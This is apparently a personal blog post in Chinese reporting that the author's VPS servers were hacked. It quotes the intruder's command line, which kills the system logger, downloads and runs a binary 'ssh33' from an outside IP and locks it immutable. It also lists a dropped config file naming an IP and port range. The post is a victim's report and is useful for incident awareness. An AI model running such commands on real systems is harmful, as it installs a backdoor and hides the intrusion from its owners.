服务器被黑了(my VPS was hacked)
访问量: 3357
自己的两台服务器昨天和今天早上都被福建的一个IP给黑了。 在1号服务器上他没做什么, 在2号服务器上他做的内容是:
killall -9 rsyslogd wget http://96.44.185.98:8080/ssh33 chmod +x ssh33 ./ssh33 chattr +i ssh33
我没有搜到 ssh33 这货是啥,唯一看到的是 里面最后一行有20W个字符。包括了各种CPP啥东东,见附件。 我估计是个后门脚本。
还在home 目录下多了一个 fack.cfg ,不知道是啥,内容是:
1 0 2 106.186.19.250:106.186.19.250 3 10000:60000 4 -59
/var/logs/kern.log 下面多了一行:
20 Jul 1 00:56:29 li539-250 kernel: imklog 5.8.6, log source = /proc/kmsg started.